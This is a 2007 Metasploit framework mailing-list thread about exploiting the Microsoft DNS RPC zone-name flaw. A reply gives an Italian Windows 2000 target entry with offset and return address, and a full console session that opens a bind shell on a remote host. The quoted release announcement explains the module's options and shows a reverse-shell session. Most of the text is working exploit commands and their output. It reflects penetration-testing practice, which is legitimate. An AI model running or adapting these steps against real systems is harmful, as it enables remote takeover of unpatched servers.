[framework] Exploiting the Microsoft DNS RPC service

diaul diaul at devilopers.org
Wed Apr 18 04:05:05 CDT 2007 

Hi

U can simply add this target:

[ 'Windows 2000 Server SP0-SP4+ Italian', { 'Off' => 1213, 'Ret' =>
0x74fd2ac4 } ],

btw some time ago I sent all windows italian opcodes to skape and now
they are available on metasploit opcodes db.

Here is msf3 session:

<CUT>

msf exploit(ms07_019_upnp) > use exploit/windows/dcerpc/msdns_zonename
msf exploit(msdns_zonename) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows 2000 SP0-SP4 / Windows 2003 SP0-SP2 English
   1   Windows 2000 Server SP0-SP4+ English
   2   Windows 2000 Server SP0-SP4+ Italian
   3   Windows 2003 Server SP0 English
   4   Windows 2003 Server SP1-SP2 English


msf exploit(msdns_zonename) > set TARGET 2
TARGET => 2
msf exploit(msdns_zonename) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf exploit(msdns_zonename) > set RHOST 10.4.14.47
RHOST => 10.4.14.47
msf exploit(msdns_zonename) > exploit
[*] Started bind handler
[*] Connecting to the endpoint mapper service...
[*] Discovered Microsoft DNS Server RPC service on port 1029
[*] Trying target Windows 2000 Server SP0-SP4+ Italian...
[*] Binding to
50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp:10.4.14.47[0] ...
[*] Bound to
50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp:10.4.14.47[0] ...
[*] Sending exploit...
[*] Error: no response from dcerpc service
[*] Command shell session 1 opened (192.168.1.80:49647 -> 10.4.14.47:4444)

Microsoft Windows 2000 [Versione 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

</CUT>

Ciao :)

diaul


Giorgio Casali wrote:
> Hi,
> is it possible to have it for the Italian version?
> Thanks
> 
> 2007/4/16, H D Moore <hdm at metasploit.com <mailto:hdm at metasploit.com>>:
> 
>     The exploit module has been merged to stable, use 'Online Update' or
>     'svn
>     update' to grab it. The module's default target will exploit Windows
>     2000
>     SP0-SP4 and Windows 2003 SP0-SP2.
> 
>     All targets are designed for the English locale. If you have a
>     non-English
>     system, submit targets.
> 
>     The Windows 2003 SP0 target may not be reliable.
> 
>     The Windows 2003 SP1-SP2 targets will only work if hardware DEP is
>     not in
>     use. We use the SEH overwrite method for all targets and the /GS stack
>     prevention means we will not be able to use standard hardware DEP bypass
>     techniques (return to NTDLL to disable NX).
> 
>     The RPORT option defaults to '0' and will contact the endpoint mapper of
>     the target system in order to determine the real RPC port at runtime.
>     This saves a step, but it does mean that one of port 135 or 593 needs to
>     be accessible on the target. If you are attacking a system with only
>     ports > 1025 allowed through the firewall, you will need to locate the
>     RPC service and set RPORT manually.
> 
>     To use the module, open the console interface, and run:
>     msf> use exploit/windows/dcerpc/msdns_zonename
>     msf exploit(msdns_zonename) >
>     msf exploit(msdns_zonename) > set PAYLOAD <your favorite payload>
>     msf exploit(msdns_zonename) > set <payload options>
>     msf exploit(msdns_zonename) > set RHOST <target>
>     msf exploit(msdns_zonename) > exploit
> 
>     -- example --
> 
>     < metasploit >
>     ------------
>            \   ,__,
>             \  (oo)____
>                (__)    )\
>                   ||--|| *
> 
> 
>            =[ msf v3.0
>     + -- --=[ 184 exploits - 104 payloads
>     + -- --=[ 17 encoders - 5 nops
>            =[ 33 aux
> 
>     msf > use exploit/windows/dcerpc/msdns_zonename
>     msf exploit(msdns_zonename) > set PAYLOAD windows/shell_reverse_tcp
>     PAYLOAD => windows/shell_reverse_tcp
>     msf exploit(msdns_zonename) > set LHOST 192.168.0.127
>     <http://192.168.0.127>
>     LHOST => 192.168.0.127 <http://192.168.0.127>
>     msf exploit(msdns_zonename) > set LPORT 4444
>     LPORT => 4444
>     msf exploit(msdns_zonename) > set RHOST 172.16.233.128
>     <http://172.16.233.128>
>     RHOST => 172.16.233.128 <http://172.16.233.128>
> 
>     msf exploit(msdns_zonename) > exploit
>     [*] Started reverse handler
>     [*] Connecting to the endpoint mapper service...
>     [*] Discovered Microsoft DNS Server RPC service on port 1356
>     [*] Trying target Windows 2000 SP0-SP4 / Windows 2003 SP0-SP2 English...
>     [*] Binding to
>     50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp:
>     172.16.233.128 <http://172.16.233.128>
>     [0] ...
>     [*] Bound to
>     50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp:172.16.233.128
>     <http://172.16.233.128>
>     [0] ...
>     [*] Sending exploit...
>     [*] Error: no response from dcerpc service
>     [*] Command shell session 1 opened (192.168.0.127:4444
>     <http://192.168.0.127:4444> ->
>     192.168.0.127:45196 <http://192.168.0.127:45196>)
> 
>     Microsoft Windows 2000 [Version 5.00.2195]
>     (C) Copyright 1985-2000 Microsoft Corp.
> 
>     c:\>
> 
> 


-------------- next part --------------
A non-text attachment was scrubbed...
Name: msdns_zonename.rb
Type: application/x-ruby
Size: 4763 bytes
Desc: not available
Url : http://spool.metasploit.com/pipermail/framework/attachments/20070418/5b9cf130/attachment.bin

More information about the framework mailing list